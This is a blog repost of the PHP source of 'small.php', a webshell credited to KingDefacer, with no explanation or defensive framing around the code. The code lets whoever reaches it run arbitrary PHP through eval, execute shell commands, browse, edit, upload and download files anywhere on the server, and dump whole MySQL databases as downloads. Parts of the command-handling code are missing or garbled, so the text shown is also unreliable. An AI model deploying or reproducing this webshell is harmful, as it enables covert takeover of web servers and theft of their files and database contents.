small.php webshell
- 发表于
- webshell
alturks.com#
# Just for fun :)#
##########################################################
error_reporting( E_ALL );
@set_time_limit( 0 );
function magic_q( $s ) {
if ( get_magic_quotes_gpc() ) {
$s = str_replace( '\\\'', '\'', $s );
$s = str_replace( '\\\\', '\\', $s );
$s = str_replace( '\\"', '"', $s );
$s = str_replace( '\\\0', '\0', $s );
}
return $s;
}
function get_perms( $fn ) {
$mode= fileperms( $fn );
$perms = '';
$perms .= ( $mode & 00400 ) ? 'r' : '-';
$perms .= ( $mode & 00200 ) ? 'w' : '-';
$perms .= ( $mode & 00100 ) ? 'x' : '-';
$perms .= ( $mode & 00040 ) ? 'r' : '-';
$perms .= ( $mode & 00020 ) ? 'w' : '-';
$perms .= ( $mode & 00010 ) ? 'x' : '-';
$perms .= ( $mode & 00004 ) ? 'r' : '-';
$perms .= ( $mode & 00002 ) ? 'w' : '-';
$perms .= ( $mode & 00001 ) ? 'x' : '-';
return $perms;
}
$head= <<
Small Shell - Edited By KingDefacer
headka;
$page= isset( $_POST['page'] ) ? $_POST['page'] : ( isset( $_SERVER['QUERY_STRING'] ) ? $_SERVER['QUERY_STRING'] : '' );
$page= $page == '' || ( $page != 'cmd' && $page != 'mysql' && $page != 'eval' ) ? 'cmd' : $page;
$winda = strpos( strtolower( php_uname() ), 'wind' );
define( 'format', 50 );
$pages = '###cmd###mysql###eval### ' . ( $winda === false ? 'id :' . `id` : '' );
switch ( $page )
{
case 'eval': {
$eval_value = isset( $_POST['eval_value'] ) ? $_POST['eval_value'] : '';
$eval_value = magic_q( $eval_value );
$action = isset( $_POST['action'] ) ? $_POST['action'] : 'eval';
if ( $action == 'eval_in_html' ) {
@eval( $eval_value );
} else {
echo( $head . $pages );
?>
' . htmlspecialchars( $cmd ) . "
\n" );
} else {
$f_action = isset( $_POST['f_action'] ) ? $_POST['f_action'] : 'view';
if ( @is_dir( $work_dir ) ) {
echo( 'Listing ' . $e_work_dir . '
' );
$handle = @opendir( $work_dir );
if ( $handle ) {
while ( false !== ( $fn = readdir( $handle ) ) ) {
$files[] = $fn;
};
@closedir( $handle );
sort( $files );
$not_dirs = array();
for ( $i = 0; $i < sizeof( $files ); $i ++ ) {
$fn = $files[ $i ];
if ( is_dir( $fn ) ) {
echo( '' . htmlspecialchars( strlen( $fn ) > format ? substr( $fn, 0, format - 3 ) . '...' : $fn ) . '' . str_repeat( ' ', format - strlen( $fn ) ) );
if ( $winda === false ) {
$owner = @posix_getpwuid( @fileowner( $work_dir . $fn ) );
$group = @posix_getgrgid( @filegroup( $work_dir . $fn ) );
printf( "% 20s|% -20s", $owner['name'], $group['name'] );
}
echo( @get_perms( $work_dir . $fn ) . str_repeat( ' ', 10 ) );
printf( "% 20s ", @filesize( $work_dir . $fn ) . 'B' );
printf( "% -20s", @date( 'M d Y H:i:s', @filemtime( $work_dir . $fn ) ) . "\n" );
} else {
$not_dirs[] = $fn;
}
}
for ( $i = 0; $i < sizeof( $not_dirs ); $i ++ ) {
$fn = $not_dirs[ $i ];
echo( '' . htmlspecialchars( strlen( $fn ) > format ? substr( $fn, 0, format - 3 ) . '...' : $fn ) . '' . str_repeat( ' ', format - strlen( $fn ) ) );
if ( $winda === false ) {
$owner = @posix_getpwuid( @fileowner( $work_dir . $fn ) );
$group = @posix_getgrgid( @filegroup( $work_dir . $fn ) );
printf( "% 20s|% -20s", $owner['name'], $group['name'] );
}
echo( @get_perms( $work_dir . $fn ) . str_repeat( ' ', 10 ) );
printf( "% 20s ", @filesize( $work_dir . $fn ) . 'B' );
printf( "% -20s", @date( 'M d Y H:i:s', @filemtime( $work_dir . $fn ) ) . "\n" );
}
echo( '
' );//此处prre请手动换成pre
?>
' . $e_work_dir . " Edit
\n" );
$f = @fopen( $work_dir, 'r' );
?>
Error ' . $e_work_dir . "
\n" );
} else {
fwrite( $f, $file_text );
fclose( $f );
echo( '' . $e_work_dir . " is saving
\n" );
}
break;
}
}
break;
}
break;
}
case 'upload' : {
if ( $work_dir == '' ) {
$work_dir = '/';
} else if ( ! ( $work_dir{strlen( $work_dir ) - 1} == '/' || $work_dir{strlen( $work_dir ) - 1} == '\\' ) ) {
$work_dir .= '/';
}
$f = $_FILES["filename"]["name"];
if ( ! @copy( $_FILES["filename"]["tmp_name"], $work_dir . $f ) ) {
echo( 'Upload is failed' );
} else {
echo( 'file is uploaded in ' . $e_work_dir );
}
break;
}
case 'download' : {
$fname = isset( $_POST['fname'] ) ? $_POST['fname'] : '';
$temp_file = isset( $_POST['temp_file'] ) ? 'on' : 'nn';
$f = @fopen( $fname, 'r' );
if ( ! ( $f ) ) {
echo( 'file is not exists' );
} else {
$archive = isset( $_POST['archive'] ) ? $_POST['archive'] : '';
if ( $archive == 'gzip' ) {
Header( "Content-Type:application/x-gzip\n" );
$s = gzencode( fread( $f, filesize( $fname ) ) );
Header( 'Content-Length: ' . strlen( $s ) . "\n" );
Header( 'Content-Disposition: attachment; filename="' . str_replace( '/', '-', $fname ) . ".gz\n\n" );
echo( $s );
} else {
Header( "Content-Type:application/octet-stream\n" );
Header( 'Content-Length: ' . filesize( $fname ) . "\n" );
Header( 'Content-Disposition: attachment; filename="' . str_replace( '/', '-', $fname ) . "\n\n" );
ob_start();
while ( feof( $f ) === false ) {
echo( fread( $f, 10000 ) );
ob_flush();
}
}
}
}
}
break;
}
case 'mysql' : {
$action = isset( $_POST['action'] ) ? $_POST['action'] : 'query';
$user = isset( $_POST['user'] ) ? $_POST['user'] : '';
$passwd = isset( $_POST['passwd'] ) ? $_POST['passwd'] : '';
$db = isset( $_POST['db'] ) ? $_POST['db'] : '';
$host = isset( $_POST['host'] ) ? $_POST['host'] : 'localhost';
$query= isset( $_POST['query'] ) ? magic_q( $_POST['query'] ) : '';
switch ( $action ) {
case 'dump' : {
$mysql_link = @mysql_connect( $host, $user, $passwd );
if ( ! ( $mysql_link ) ) {
echo( 'Connect error' );
} else {
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file = isset( $_POST['to_file'] ) ? ( $_POST['to_file'] == '' ? false : $_POST['to_file'] ) : false;
$archive = isset( $_POST['archive'] ) ? $_POST['archive'] : 'none';
if ( $archive !== 'none' ) {
$to_file = false;
}
$db_dump= isset( $_POST['db_dump'] ) ? $_POST['db_dump'] : '';
$table_dump = isset( $_POST['table_dump'] ) ? $_POST['table_dump'] : '';
if ( ! ( @mysql_select_db( $db_dump, $mysql_link ) ) ) {
echo( 'DB error' );
} else {
$dump_file = "#ZaCo MySQL Dumper\n#db $db from $host\n";
ob_start();
if ( $to_file ) {
$t_f = @fopen( $to_file, 'w' );
if ( ! $t_f ) {
die( 'Cant opening ' . $to_file );
}
} else {
$t_f = false;
}
if ( $table_dump == '' ) {
if ( ! $to_file ) {
header( 'Content-Type: application/x-' . ( $archive == 'none' ? 'octet-stream' : 'gzip' ) . "\n" );
header( "Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql" . ( $archive == 'none' ? '' : '.gz' ) . "\"\n\n" );
}
$result = mysql_query( 'show tables', $mysql_link );
for ( $i = 0; $i < mysql_num_rows( $result ); $i ++ ) {
$rows= mysql_fetch_array( $result );
$result2 = @mysql_query( 'show columns from `' . $rows[0] . '`', $mysql_link );
if ( ! $result2 ) {
$dump_file .= '#error table ' . $rows[0];
} else {
$dump_file .= 'create table `' . $rows[0] . "`(\n";
for ( $j = 0; $j < mysql_num_rows( $result2 ) - 1; $j ++ ) {
$rows2 = mysql_fetch_array( $result2 );
$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ( $rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL' ) . ",\n";
}
$rows2 = mysql_fetch_array( $result2 );
$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ( $rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL' ) . "\n";
$type[ $j ] = $rows2[1];
$dump_file .= ");\n";
mysql_free_result( $result2 );
$result2 = mysql_query( 'select * from `' . $rows[0] . '`', $mysql_link );
$columns = $j - 1;
for ( $j = 0; $j < mysql_num_rows( $result2 ); $j ++ ) {
$rows2 = mysql_fetch_array( $result2 );
$dump_file .= 'insert into `' . $rows[0] . '` values (';
for ( $k = 0; $k < $columns; $k ++ ) {
$dump_file .= $rows2[ $k ] == '' ? 'null,' : '\'' . addslashes( $rows2[ $k ] ) . '\',';
}
$dump_file .= ( $rows2[ $k ] == '' ? 'null);' : '\'' . addslashes( $rows2[ $k ] ) . '\');' ) . "\n";
if ( $archive == 'none' ) {
if ( $to_file ) {
fwrite( $t_f, $dump_file );
fflush( $t_f );
} else {
echo( $dump_file );
ob_flush();
}
$dump_file = '';
}
}
mysql_free_result( $result2 );
}
}
mysql_free_result( $result );
if ( $archive != 'none' ) {
$dump_file = gzencode( $dump_file );
header( 'Content-Length: ' . strlen( $dump_file ) . "\n" );
echo( $dump_file );
} else if ( $t_f ) {
fclose( $t_f );
echo( 'Dump for ' . $db_dump . ' now in ' . $to_file );
}
} else {
$result2 = @mysql_query( 'show columns from `' . $table_dump . '`', $mysql_link );
if ( ! $result2 ) {
echo( 'error table ' . $table_dump );
} else {
if ( ! $to_file ) {
header( 'Content-Type: application/x-' . ( $archive == 'none' ? 'octet-stream' : 'gzip' ) . "\n" );
header( "Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql" . ( $archive == 'none' ? '' : '.gz' ) . "\"\n\n" );
}
if ( $to_file === false ) {
header( 'Content-Type: application/x-' . ( $archive == 'none' ? 'octet-stream' : 'gzip' ) . "\n" );
header( "Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql" . ( $archive == 'none' ? '' : '.gz' ) . "\"\n\n" );
}
$dump_file .= "create table `{$table_dump}`(\n";
for ( $j = 0; $j < mysql_num_rows( $result2 ) - 1; $j ++ ) {
$rows2 = mysql_fetch_array( $result2 );
$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ( $rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL' ) . ",\n";
}
$rows2 = mysql_fetch_array( $result2 );
$dump_file .= '`' . $rows2[0] . '` ' . $rows2[1] . ( $rows2[2] == 'NO' && $rows2[4] != 'NULL' ? ' NOT NULL DEFAULT \'' . $rows2[4] . '\'' : ' DEFAULT NULL' ) . "\n";
$type[ $j ] = $rows2[1];
$dump_file .= ");\n";
mysql_free_result( $result2 );
$result2 = mysql_query( 'select * from `' . $table_dump . '`', $mysql_link );
$columns = $j - 1;
for ( $j = 0; $j < mysql_num_rows( $result2 ); $j ++ ) {
$rows2 = mysql_fetch_array( $result2 );
$dump_file .= 'insert into `' . $table_dump . '` values (';
for ( $k = 0; $k < $columns; $k ++ ) {
$dump_file .= $rows2[ $k ] == '' ? 'null,' : '\'' . addslashes( $rows2[ $k ] ) . '\',';
}
$dump_file .= ( $rows2[ $k ] == '' ? 'null);' : '\'' . addslashes( $rows2[ $k ] ) . '\');' ) . "\n";
if ( $archive == 'none' ) {
if ( $to_file ) {
fwrite( $t_f, $dump_file );
fflush( $t_f );
} else {
echo( $dump_file );
ob_flush();
}
$dump_file = '';
}
}
mysql_free_result( $result2 );
if ( $archive != 'none' ) {
$dump_file = gzencode( $dump_file );
header( 'Content-Length: ' . strlen( $dump_file ) . "\n" );
echo $dump_file;
} else if ( $t_f ) {
fclose( $t_f );
echo( 'Dump for ' . $db_dump . ' now in ' . $to_file );
}
}
}
}
}
break;
}
case 'query' : {
echo( $head . $pages );
?>
\n" );
for ( $i = 0; $i < mysql_num_fields( $result ); $i ++ ) {
echo( '' . htmlspecialchars( mysql_field_name( $result, $i ) ) . ' ' );
}
echo( "\n \n" );
for ( $i = 0; $i < mysql_num_rows( $result ); $i ++ ) {
$rows = mysql_fetch_array( $result );
echo( '' );
for ( $j = 0; $j < mysql_num_fields( $result ); $j ++ ) {
echo( '' . ( htmlspecialchars( $rows[ $j ] ) ) . ' ' );
}
echo( " \n" );
}
echo( "\n" );
}
mysql_close( $mysql_link );
}
break;
}
}
break;
}
}
?>
Edited By KingDefacer
原文连接:small.php webshell
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
